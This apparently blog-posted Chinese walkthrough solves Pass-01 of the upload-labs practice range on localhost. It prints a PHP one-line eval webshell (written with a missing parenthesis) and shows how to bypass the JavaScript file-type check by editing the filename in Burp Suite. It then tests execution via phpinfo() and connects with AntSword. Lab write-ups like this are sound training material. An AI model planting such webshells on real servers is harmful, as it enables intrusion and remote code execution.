upload-labss Pass-01

1.打开http://localhost/,进入首页,点击Pass-01。

2.首先测试上传后缀为jpb的图片直接上传成功。地址为http://localhost/upload/1.jpg。

3.构建PHP一句话木马。新建记事本,输入<?php eval ($_REQUEST["6"];?>,另存为PHP后缀文件,继续上传,提示报错:该文件不允许上传,请上传.jpg|.png|.gif类型的文件,当前文件类型为:.php

4.将一句话木马后缀改为.jpg,然后打开BP,上传抓包查看。

5.因此关卡的验证方式为Js验证(前端验证),所以修改一句话木马文件后缀为.JPG后,我们直接在BP中的“filename”中的h.jpg重新改为.php放包即可绕过前端的验证,放包后即上传成功。

6.右键打开文件地址,可以看到一句话木马的所在路径为:http://localhost/upload/h.php,然后输入http://localhost/upload/h.php?6=phpinfo();返回PHP服务器的配置信息页面即表示上传成功。

7.打开中国蚁剑,右键添加数据,点击测试链接后提示连接成功。


发表回复